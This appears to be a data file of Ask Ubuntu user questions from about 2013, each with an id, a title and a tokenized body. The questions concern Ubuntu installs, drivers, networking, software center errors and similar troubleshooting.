376754	no option for installing ubuntu on new system	i 've just got a new microserver ( hp proliant microserver ) and i 'm trying to setup ubuntu server 12.04.3 lts . this microserver does n't have any operating system installed currently . i 've booted ubuntu from a usb drive and successfully rendered the menu . unfortunately the menu only give me 3 options : test memory boot from first hard disk rescue a broken system i 've tried all options . test memory just takes me to the text mode interface with an error message . boot from first hard disk just reboots the menu . and rescue a broken system takes me to rescue mode . could anybody please assist and tell me where i 'm going wrong ? i 'm a complete newbie with ubuntu so excuse my ignorance if it 's quite obvious . i 've searched the web but ca n't find a solution . thank you in advance
376755	install problem , no graphics	i was trying to install ubuntu 12.04 on an old laptop the install seems to go ok with the wubi installer until it reboots into ubuntu . the screen is full of thin vertical or horizontal lines , just one step up from `` static . '' i do n't get an error message , at least not one that i can see . this happened with the live dvd , too . i did n't even get to where i could choose to install or just run . dell 1501 amd turion processor ati radeon xpress integrated graphics win7 , originally xp
376756	files uploaded to ubuntu one appear as binary files when they were n't	i uploaded some files to ubuntu one but when i tried to access them they were type ; binary ( application/octet-stream ) can i rectify this or are the files ruined as i have lost the originals ?
376757	ubuntu 12.04 or 13.10 and windows 8.1 in a lenovo y480	i 'm new to linux evironment . i tried to install ubuntu 12.04 in a lenovo y480 with windows 8.1 , but when the installer asks what do i want to do , the option to keep both the os does not appear . how can i install ubuntu in this laptop ? thanks ! !
376759	what 's the correct choice if i want something like freebsd ports on ubuntu ?	i was using freebsd , and now i have to switch to ubuntu due to platform support of a commercial program . anyway , i am missing freebsd port system and looking for something similar . i heard gentoo package is one of it . can i use it on ubuntu ? any caveat ? any caveats ?
376760	can not properly install blender	i think its time to give up . i installed ubuntu 12.04 two days ago . and wasted 36 hours on finding solution here at askubuntu and other forums , following them more than 4 times reinstalled ubuntu but its such a waste , not because ubuntu is not good , because there are so many different information here , so confusing for newbies like me . so thought it 's time to get back to windows , still i want to try one more time , this time i again reinstalled a fresh ubuntu and here is what i want . i want to run blender 2.69. what i have . ⠀i7 processor with 3gb ⠀nvidia geforce 640 with 4gb ram what i did so far . tried many follow up here on askubuntu . got some response to my help call too . but they just keep quiet after a few answers and leave me in the middle of nowhere , then i have installed fresh and follow again different suggestion . the one i found very easy to follow is this tutorial but the installation of nvidia worked and the installation of cuda failed , again i installed ubuntu fresh one , and started second time this time the first step installation of nvidia failed . now its fresh installation of ubuntu . thanks for your response . i have cuda 5 , i dont know when i try to download there was more than one type ubuntu 12.04 deb** run deb** run deb i just choose run . i want blender to use my nvidia graphics card for better performance , once i installed blender and it was working but in preference > system i did not find gpu or my nvidia option , it was just cpu , so i removed it , for the link you provided i did not try that but i will try it and get back to you , if i can have your skype would be nice , i will only bother you till my computer is up and running again properly with blender , : ) thanks . the link provided to download blender at the page on your given link does not exist , but i will download it from the main side if it 's ok . i followed your step at the provided link , but ... ... it 's not clear how to open blender application , anyway i went to the folder containing blender and clicked on blender.exe and found this error message : archive : /home/shams/blender/blender.exe [ /home/shams/blender/blender.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/shams/blender/blender.exe ... or /home/shams/blender/blender.exe.zip and can not find /home/shams/blender/blender.exe.zip period . and when i try to run from the terminal shams @ ubuntu : ~ $ sudo cp ~/blender /usr/lib/blender -r [ sudo ] password for shams : shams @ ubuntu : ~ $ blender the program 'blender ' is currently not installed . you can install it by typing : sudo apt-get install blender shams @ ubuntu : ~ $ ... so , should i use sudo apt-get install blender ? these are links to my screenshots from blender and additional drivers : ⠀http : //grab.by/s3k8 ⠀http : //grab.by/s3k0 ⠀http : //grab.by/s3k4 ⠀http : //grab.by/s3me ⠀http : //grab.by/s3n6 i have a new issue with my nvidia geeforce 640 on i7 processor can somebody help please . thanks here are some ouptu shams @ ubuntu : ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . error : glx is not available on the system shams @ ubuntu : ~ $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation device 0fc1 ( rev a1 ) shams @ ubuntu : ~ $
376763	ubuntu system time	i have ubuntu 13.10 and win8.1 on my computer and i have set the time zones correctly and sync the system time with internet for both os . however , when i switch between these two os , the system time are always incorrect . can anyone solve the problem please ?
376766	when renaming files in ubuntu 13.1 , the label is too dark until edit is complete	fresh install of ubuntu 13.1 . when renaming files , the labels are too dark to see until the label edit is finished - then the file label can be seen properly . the background is dark and the characters are dark making the edit very hard to see . how can this be changed ? is there a setting in the file manager ? i have not found a setting to fix this . thanks !
376774	formatting a hard drive-daemon is inhibited	i 'm brand new to ubuntu ( and still getting my sea-legs with computer repairs in general ) and am attempting to completely start from scratch on a hard disc that had a bad install of vista in order to get ubuntu running off of the hard drive as opposed to a usb drive ; however , every time i attempt to format the disc , i get an error that simply says `` daemon is inhibited . '' i have no idea what this means , how to fix it , or if it even is fixable . any and all help would be greatly appreciated . i 've been trying with gparted and the standard disc utility .
376777	ubuntu software center not appearing	i just installed lubuntu on my cubieboard ( cubieboard.org ) . i attempted to install ubuntu software center from synaptic package manager , and everything all went smoothly until i tried to open up software center and nothing appear . i tried to use command line software-center heres the output : linaro @ cubieboard2 : ~ $ software-center < p > error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 128 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 53 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro i tried to reinstall and it still gives me the same error , sudo apt-get remove software-center sudo apt-get install software-center ps : sorry for my bad english . updates : linaro @ cubieboard2 : ~ $ sudo apt-get update ign http : //ppa.launchpad.net quantal inrelease ign http : //ports.ubuntu.com quantal inrelease hit http : //ppa.launchpad.net quantal release.gpg hit http : //ports.ubuntu.com quantal release.gpg hit http : //ppa.launchpad.net quantal release hit http : //ports.ubuntu.com quantal release hit http : //ppa.launchpad.net quantal/main sources hit http : //ports.ubuntu.com quantal/main sources hit http : //ppa.launchpad.net quantal/main armhf packages hit http : //ports.ubuntu.com quantal/universe sources hit http : //ports.ubuntu.com quantal/main armhf packages hit http : //ports.ubuntu.com quantal/universe armhf packages hit http : //ports.ubuntu.com quantal/main translation-en hit http : //ports.ubuntu.com quantal/universe translation-en ign http : //ppa.launchpad.net quantal/main translation-en reading package lists ... done linaro @ cubieboard2 : ~ $ sudo apt-get update ign http : //ppa.launchpad.net quantal inrelease ign http : //ports.ubuntu.com quantal inrelease hit http : //ppa.launchpad.net quantal release.gpg hit http : //ports.ubuntu.com quantal release.gpg hit http : //ppa.launchpad.net quantal release hit http : //ports.ubuntu.com quantal release hit http : //ppa.launchpad.net quantal/main sources hit http : //ports.ubuntu.com quantal/main sources hit http : //ppa.launchpad.net quantal/main armhf packages hit http : //ports.ubuntu.com quantal/universe sources hit http : //ports.ubuntu.com quantal/main armhf packages hit http : //ports.ubuntu.com quantal/universe armhf packages hit http : //ports.ubuntu.com quantal/main translation-en hit http : //ports.ubuntu.com quantal/universe translation-en ign http : //ppa.launchpad.net quantal/main translation-en reading package lists ... done linaro @ cubieboard2 : ~ $ sudo apt-get install -- reinstall software-center reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-notify-0.7 python-pysqlite2 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 2 not upgraded . need to get 0 b/627 kb of archives . after this operation , 0 b of additional disk space will be used . warning : the following packages can not be authenticated ! software-center authentication warning overridden . ( reading database ... 60527 files and directories currently installed . ) preparing to replace software-center 5.4.1.2 ( using ... /software-center_5.4.1.2_all.deb ) ... unpacking replacement software-center ... processing triggers for desktop-file-utils ... processing triggers for man-db ... processing triggers for hicolor-icon-theme ... setting up software-center ( 5.4.1.2 ) ... error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 38 , in < module > from softwarecenter.db.update import rebuild_database file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 33 , in < module > from softwarecenter.backend.scagent import softwarecenteragent file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 28 , in < module > from softwarecenter.distro import get_distro , get_current_arch file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro linaro @ cubieboard2 : ~ $ software-center error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 128 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 53 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro
376779	almost ready to downgrade over frustration	i have two problems that no one will seem to answer . it involves two things : network connectivity and key features such as restart and shutdown not working . the network wo n't re-enable after suspend . this is really annoying . i use features such as apache to serve locally . when network connectivity gets lost after wake , people get angry . i have two screens , and ever since i attached the second one , features , more specifically the bottom three options in the settings menu ( top right ) , are n't working . however , the terminal does work . i need someone to help me , or i 'm going to have to go back to , most likely , 12.04 . i have all updates currently installed , and i 'm getting sick of these problems . laptop : acer aspire 5250 . everything worked on every past version of ubuntu from 12.04lts to 13.04 ( currently 13.10 )
376781	can not connect to a wired network on ubuntu 12.04	what i 've done so far : i have set managed to true in networkmanager.conf . i have commented out everything in /etc/network/interfaces my situation : in the network manager dropdown panel , it says `` wired network \n disconnected '' in the network manager `` connections manager '' , i have a wired connection set up with dhcp ifconfig -a : http : //pastebin.com/k8gz4tai can someone walk me through getting this working ? thanks !
376783	no space left on device . recently mounted ntfs drive to /home	my ssd is quite small , so i was hoping to use my other drive that i have all my data on that was used when i had windows . i ended up mounting it fine but , for some reason i ca n't download or install any data to it . xenos @ proteus /home $ wget http : //tuxera.com/opensource/ntfs-3g_ntfsprogs-2013.1.13.tgz -- 2013-11-13 21:32:53 -- http : //tuxera.com/opensource/ntfs-3g_ntfsprogs-2013.1.13.tgz resolving tuxera.com ( tuxera.com ) ... 77.86.224.47 connecting to tuxera.com ( tuxera.com ) |77.86.224.47|:80 ... connected . http request sent , awaiting response ... 200 ok length : 1176304 ( 1.1m ) [ application/x-gzip ] saving to : ‘ntfs-3g_ntfsprogs-2013.1.13.tgz’ 0 % [ ] 0 -- .-k/s in 0s can not write to ‘ntfs-3g_ntfsprogs-2013.1.13.tgz’ ( no space left on device ) . xenos @ proteus /home $ df -i filesystem inodes iused ifree iuse % mounted on /dev/sda1 1169168 164877 1004291 15 % / none 1537096 1 1537095 1 % /sys/fs/cgroup udev 1532793 629 1532164 1 % /dev tmpfs 1537096 636 1536460 1 % /run none 1537096 1 1537095 1 % /run/lock none 1537096 10 1537086 1 % /run/shm none 1537096 18 1537078 1 % /run/user /dev/sdc2 952801440 919292 951882148 1 % /home /dev/sdd1 156201564 32 156201532 1 % /media/xenos/new volume xenos @ proteus /home $ df -h filesystem size used avail use % mounted on /dev/sda1 18g 4.1g 13g 25 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 5.9g 12k 5.9g 1 % /dev tmpfs 1.2g 1.1m 1.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 5.9g 1.5m 5.9g 1 % /run/shm none 100m 24k 100m 1 % /run/user /dev/sdc2 1.4t 490g 908g 36 % /home /dev/sdd1 150g 109m 149g 1 % /media/xenos/new volume xenos @ proteus /home $
376788	gksudo nautilus - incorrect password	i have ubuntu 12.04 running on my office pc . i have a standard user working on it ( with limited privileges ) . i 'm looking at the screen through team viewer and i am trying to run gksudo -u adminuser nautilus but it keeps reporting incorrect password ... try again i ca n't figure out why ... suspecting my password must be corrupt , i tried running software updates and it works fine . what is the solution to this ? thanks !
376789	netflix wo n't open on clean install of 13.10	i just installed a clean version of 13.10 ( saucy ) and tried to install netflix using these instructions . the installation seemed to go fine , i opened netflix after and it asked me to install a bunch of extra things through wine , so i did . but after that , clicking on the netflix launcher icon did nothing . no windows open , no error message ... nothing . then i tried running netflix-desktop from the terminal . it pauses for maybe ten seconds , then takes me back to the command prompt . no error messages or anything else is printed at the terminal . i tried running wine-browser too at the terminal and the same thing . however , if i run either of the aforementioned commands with sudo , it prints wine : /home/jacob/.wine-browser is not owned by you wine : /home/jacob/.wine-browser is not owned by you wine : /home/jacob/.wine-browser is not owned by you but otherwise the same behavior . any idea what 's going on ? the only thought i have is that i installed an nvidia close-source driver ( version 319 ) and maybe that 's doing something , but i have no idea . any help would be appreciated .
376791	how to prevent ubuntu touch from entering sleep mode ?	i install ubuntu touch on my android device galaxy nexus . i want to use my device as http server . so i tried to connect to my device but it did n't respond . i found that the device is in hibernation . how can i prevent this device from entering sleep mode ?
376792	looking the modifications to disable capture for alsa driver	i wrote alsa drivers for mycard by referring dummy.c sound drivers . my card doesnt support capture functionality . i defined playback operations but not capture operations to avoid capture support . my card driver resides along with other additional usb audio devices . i have a issue with master volume control . when i use amixer to control the master volume , it applies for both palyback and capture streams . for capture amixer function snd_mixer_selem_has_capture_channel ( elem , chn ) returns true for both left and right channels . because of this playback volume put operations is called for capture also . since the same volume control operation is called for both playback and capture it makes volume controls applies twice ( increments / decrements ) . i modified snddevice script not to create capture devices and ensure the same @ /dev/snd . i need help to avoid / disable this capture support , so that snd_mixer_selem_has_capture_channel ( elem , chn ) return false for card playback channels .
376793	mounting usb on nand partiion	i want to write the uboot.bin to my nand flash partiton i.e , on /dev/mtd0 so i copied uboot.bin file to usb . i need to mount usb on nand . how to mount usb on nand ? so that i can use dd commamd to write file to nand . please anyone help me , how to mount the usb on nand ?
376795	scid-4.10 chess viewer compile error	getting this error while compiling chess viever compiling sourceforge src scid-4.10 i end up `` src/polyglot/board.cpp:6:18 : fatal error : cstdio : no such file or directory '' i have ubuntu 12 . how to fix the problem ?
376796	403 forbidden error for all local projects after updating php and apache	i have 5 web app projects in my local machine with ubuntu 12.04 installed on it . everything was good , but today when i started a new project with symphony , i found that i should upgrade php to 5.4.x , so i did it and upgraded to apache2 too . after these updates i restarted my pc [ for some reasons ] and now i see a 403 forbidden page ( from apache2 web-server ) for all of my projects.i did n't change permissions or the apache virtual host configuration , nothing and nothing . just after restart i see 403 forbidden ! i 'm beginner in ubuntu so if you want any information about users , groups , or ... please say how can i find it for you , thanks i tried to change the whole web-root directory permission to 777 and change user : group to www-data or root , but nothing happened . apache 2.4.6php 5.5.5-1 example , this is the thenetmoon project and it was done with symfony , but apache ca n't access the web folder :
376801	could not find live medium ubuntu 12.04.3	i am attempting to install ubuntu 12.04.3 on my acer v5-552g-x412 64 bit computer , and am having some trouble with it . i was able to install windows 7 on it previously after uninstalling windows 8 , but i am now interested in getting a separate partition with ubuntu installed . my problem is that when i try to load up ubuntu with a usb , i used universal usb installer 1.9.4.8 which was linked to on the info page on the ubuntu website . when i restart my computer with the usb plugged in , i get to a ubuntu loading screen , which then asks me to select a language . i do so , and then it gives a list of options like trying ubuntu without installing , or installing it . if i pick install ubuntu , i get into a loading screen that loads for about 60 seconds and then says `` could not find a live medium '' or something like that . i did select `` format usb to fat32 '' when installing the ubuntu iso on my usb . has anyone encountered such problems before , and if so , do they have a solution ? any help would be greatly appreciated , thanks .
376803	problem with ubuntu software center and desktop background , ubuntu13.04	whenever i try to open the software center it shows up for a second and terminate itself . also , with background , i ca n't change the desktop background . whenever i click on change desktop background , it takes me to the system setting . so do n't know what to do . i googled it but did n't find the expected result please help ! ! !
376804	how to stop ubuntu-1 delete sync feature ?	i use ubuntu-1 . now last time i accidentally deleted my documents.unfortunately ubuntu-1 was in sync so the documents got deleted from there too . i do n't want this to happen again . so is there any way such that ubuntu-1 will only sync files , but if i delete in my folder , it will not delete it in the cloud ?
376805	blank when install ubuntu 12.04	i 've been trying to install ubuntu 12.04 on my hp mini 110 . i 'm using a usb key to install ubuntu . when i choose to boot from the usb key it 's blank ; i 've waited 30 minutes but it 's still blank . please help me . sorry for my english .
376809	partitioning problem after i updated ubuntu	after i updated ubuntu i get this error message please help . error : no such partition.grub rescue > i cant get anything to work please help . i have tried the 1s up to 5
376814	ubuntu 13.10 upgrade - unusual results	i have just done an upgrade from ubunto 13.04 to ubuntu 13.10 and have some unusual results after rebooting the system is a dual-bool with windows 7 on a 160gb hdd and ubuntu on a 32gb usb flash drive - everything has worked perfectly until the upgrade after rebooting i accessed the 'splash '' button ( top-left hand corner ) and all icons reviouslyt displayed in 13.04 are no longer displaying i ca n't access `` terminal ' or any other control panel icons the 160gb hdd is no longer displaying i have no clock or system settings icons in the top right-corner , meaning i ca n't shutdown or resrat linux gracefully programs in my toolbar ( like teamviewer ) are no longer displaying i have had to force the machine to reboot , as well as trying several earlier kernels i am at a loss to explain what 's happened - something has gone wrong somewhere if someone could help by guiding me in the correct direction i 'd be grateful
376815	how to connect mtp android device to ubuntu 13.10	i searched here and google and all i could find is how in ubuntu 13.04 forward mtp devices are supported . the answer i found are for ubuntu 12.04 or ubuntu 12.10 well , i connected my phone in mtp mode and i do n't see it on my machine . how can i see it ? edit : requested data this is my phone ( xtreamer q ) i also tried a samsung galaxy s2 device , which popped an error message ( unable to mount device ) . my phone did n't give such mistake . and this is the output of lsusb and mtp-detect └┌ ( % : ~/applications/process.1dfit ) ┌- lsusb bus 002 device 004 : id 04f2 : b1fc chicony electronics co. , ltd bus 002 device 005 : id 045e:009d microsoft corp. wireless optical desktop 3.0 bus 002 device 007 : id 283b:10a3 bus 002 device 003 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0a5c:217f broadcom corp. bcm2045b ( bdc-2.1 ) bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ┌┌ ( y2 @ walking ) ┌ ( 15/pts/0 ) ┌ ( 03:52pm:11/14/13 ) ┌- └┌ ( % : ~/applications/process.1dfit ) ┌- mtp-detect unable to open ~/.mtpz-data for reading , mtpz disabled.libmtp version : 1.1.6 listing raw device ( s ) no raw devices found . i guess that the third text line from the bottom is the problem . but i do n't what to do with it .
376816	what ubuntu should i install ?	my purpose is to have an os like unmanage vps/server for web hosting out there . for learning in my own space before jumping to online ! i have a notebook dell vostro 3460 with i5 3230m . i have window 7 ultimate 32bit currently running . i want to know : what ubuntu should i install for my purpose ( desktop or server ) ? should i use 32bit or 64bit ? which version is suitable for newbie start learning like me ( 12.04.3 lts or 13.10 ) ? thanks in advanced ! please , easy on me as i 'm just starting out !
376817	ubuntu 13.10 does n't detect my mts modem	i am new to ubuntu . i have installed ubuntu 13.10 alongside windows 7 . i have been using a mts mblaze modem v2.1.2 in my windows 7 . after installing ubuntu 13.10 i connected my modem in it . but ubuntu did n't even detect my device . so i tried to establish a network manually and created a mobile broadband connection and entered username and password and saved the setting . and when i tried to connect the modem again , the network icon tried to establish a connection but it did n't connect . and also the movies and music are not playing in my ubuntu13.10 . can anyone help ?
376822	same virtualenv when splitting window	when i have virtualenv activated in a window in terminator and i split the window i would like that the new window have the same virtualenv activated . i need to run this script somehow , i ca n't figure out where i should put it : if [ -n `` $ virtual_env '' ] ; then . `` $ virtual_env/bin/activate '' else workon default fi from here
376823	wifi works in 12.04 but not in 13.10 ?	my network controller is intel corp. pro/wireless 4965 ag or agn . it works under 12.04 when i add `` blacklist acer-wmi '' to blacklist.conf , but not in 13.10. rfkill unblock all does not solve the problem , either . any help please ?
376824	difference between make-kpkg and make deb-pkg	i have build the kernel image by make-kpkg and make deb-pkg in 13.04 ubuntu and noticed that image size is very big in case of deb-pkg build . deb-pkg build size is 13 times bigger than make-kpkg . can anyone please share why the difference is there ? regards titu
376825	how do i backup my videos folder	is there a way that i can compress my videos folder to a very small size that can fit in an 8 gb usb-drive ? the folder is about 32 gb and has all our family videos in it . i tried backing up but the back up file is just way too big . any help will be appreciated and thanks in advance and please can you give instruction in a way a newbie can understand as i have just started running linux info : running ubuntu 12.10 on an hp pavillion
376830	having problem with alias ?	i am trying to define alias for a group of commands counting and displaying the number of all files in accountâs space with the names starting with g , t , and w. i got the result with the following command . find $ home -name ' [ gtw ] * ' | wc -l but when i try to give the command , alias i got error alias noagtw='find $ home -name ' [ gtw ] *'| wc -l ' the error reads like this noagtw find : paths must precede expression : testing usage : find [ -h ] [ -l ] [ -p ] [ -olevel ] [ -d help|tree|search|stat|rates|opt|exec ] [ path ... ] [ expression ] 0 can anyone help me please ?
376836	ubuntu touch stable rom for samsung galaxy s gt i9000	hi i 'm looking to solve this problema too , i would like to know if is there already a ubuntu touch stable room for my galaxy s gt i9000 , cause i 've seen the ubuntu touch and i love it , please is there any way to install a stable rom for me , the phone , wi-fi working ? please help me . sorry for my bad english i 'm na angolan ( from ăfrica ) , hope you get the message : ) . tnkx
376838	restoring backed up thunderbird files	how can i restore my backed up thunderbird files after format ? do i just copy the files back where thunderbird store these files ? or must i use import in thunderbird ? what is the best way ?
376839	how to run javascript in mozilla url bar ?	i am using mozilla and trying to run this code on the url bar javascript : alert ( document.cookie ) ; but when i hit go , nothing happens . but in chromium , it alerts , so what is with the firefox ? does firefox enters http by default . if this , then how do i prevent this ?
376840	how to show never played albums in clementine	is there some kind of filter or smart playlist that would allow me to show only albums that have never been played before or that have been played a specific amount of times ? the smart playlist `` never played '' , it seems that picks random songs that have never been played , instead of full albums . any suggestions ? i use clementine 1.2
376842	how do i get a log or an error output from any application run from the terminal ?	i want to know how to get a log file of a program . this is useful to find the faults in an application when it crashes . i mean opening the application through the terminal and at the same time writing a log file . are there special commands to do this , or is it automatically done whenever an application is run ? if so , where is that log file stored ?
376844	confused with the alias solution ?	i am trying to define alias for a group of commands counting recursively and displaying the number of all sub-directories encountered for any working directory ( including ones with invisible file names ) . so far what i have done is : ls -r | wc -l but it does not display the hidden files number . so i tried this command : ls -l | grep ^d | wc -l but i am not sure whether it is the right command or not ?
376847	cant resume torrent downloads after restarting the pc	i was trying to download big files from torrent in my place the electricity is gone off for 2- 3 hours every 24 hour , which will interrupt my torrent download . on windows torrent when i turn on my pc when the electricity comes and it complete the download , on ubuntu it just give and error and restart the download from the beginning . i tried more than file all the same . i tried 3 ubuntu torrent clients they all cant resume the download transmission say that it cant locate the files , qbitroent gives this error please help me i so confused this is the 3 time id re download this film .
376854	the creation of swap space in partition # 9 of scsi3 ( 0,0,0 ) ( sda ) failed	i am trying ubuntu 13.04 from sandisk cruzer blade . i want to install it . i created a partition of 25 gb . i formatted to ex4-or something like that and mounted it to- / but i am reciving - the creation of swap space in partition # 9 of scsi3 ( 0,0,0 ) ( sda ) failed . see picture-
376855	dual booting unix from /dev/sdb	i know there are many dual-boot posts already , but i have tried most of the solutions without success . my situation differs slightly . i have 2 hard disks . i am running windows 7 and ubuntu on sda1 ( both are working well ) and trying to install back-track to sdb ( it is an ssd ) . however , when i select backtrack from the grub menu , i get the error message : no such device : 3c19f052-1344-4e54-878a-4f7849e7882c hd1 can not get c/h/s values you need to load the kernel first i have re-installed several times , and during install , i always choose to install grub to /dev/sdb . ( chose sda once and it could not boot any of the other 2x os as well ) info from boot-repair is posted at http : //paste.ubuntu.com/6414903/ -- > everything seems in order . does any1 have any hints ?
376859	keyboard on laptop not working 100 %	i 've upgraded from 11.10 to 13.04 , then now 13.10 without a re-install . the keyboard worked fine before but now i can type in my log on details to get into ubuntu , i can also type on dash . other than this ( on the desktop ) , no output from the keyboard when using any other apps . could it be my config files on my home are too messy and should i just re-install 13.10 any help would be great
376860	internet connectivity	i have a computer with two network ports.eth0 is connected to lan and i want to connect eth1 to internet using a wired environment , so far eth0 is an onboard and working fine but eth1 is pci card and how do i configure it to connect to internet ?
376863	fresh ubuntu 13.10 install has slow unity animations with haswell integrated graphics	i got a new pc with an i5-4570 that has an hd4600 integrated graphics card . ( it also came with a discrete radeon 7670 card which i disabled in the bios because it seem it is easier to get along with intel drivers these days ? ? ) . i did a fresh install but some unity animations are slow and stutter . for example alt+tab switching or super+s window spread animation etc.. it seems everything is set up correctly but these stuttering animations are kind of annoying . here are some outputs : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) haswell desktop opengl version string : 3.0 mesa 9.2.1 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes ~ $ glxgears running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 303 frames in 5.0 seconds = 60.546 fps 301 frames in 5.0 seconds = 60.033 fps 301 frames in 5.0 seconds = 60.033 fps
376864	usb 3.0 asix ax88179 not working on ubuntu 13.10	i upgraded from 13.04 to 13.10 and i had the ax88179 driver installed from the ppa . when i upgraded the usb 3.0 to ethernet converter stopped working although it should be included in the kernel mainline starting from 3.9 . it is being recognized by the system but no connection is being made . here 's the relevant verbose lsusb output : bus 004 device 006 : id 0b95:1790 asix electronics corp. device descriptor : blength 18 bdescriptortype 1 bcdusb 3.00 bdeviceclass 255 vendor specific class bdevicesubclass 255 vendor specific subclass bdeviceprotocol 0 bmaxpacketsize0 9 idvendor 0x0b95 asix electronics corp. idproduct 0x1790 bcddevice 1.00 imanufacturer 1 asix elec . corp. iproduct 2 ax88179 iserial 3 00000000000001 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 57 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 124ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 3 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 0 iinterface 4 network_interface endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 11 bmaxburst 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0400 1x 1024 bytes binterval 0 bmaxburst 3 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0400 1x 1024 bytes binterval 0 bmaxburst 15 binary object store descriptor : blength 5 bdescriptortype 15 wtotallength 22 bnumdevicecaps 2 usb 2.0 extension device capability : blength 7 bdescriptortype 16 bdevcapabilitytype 2 bmattributes 0x00000002 link power management ( lpm ) supported superspeed usb device capability : blength 10 bdescriptortype 16 bdevcapabilitytype 3 bmattributes 0x00 wspeedssupported 0x000e device can operate at full speed ( 12mbps ) device can operate at high speed ( 480mbps ) device can operate at superspeed ( 5gbps ) bfunctionalitysupport 1 lowest fully-functional device speed is full speed ( 12mbps ) bu1devexitlat 1 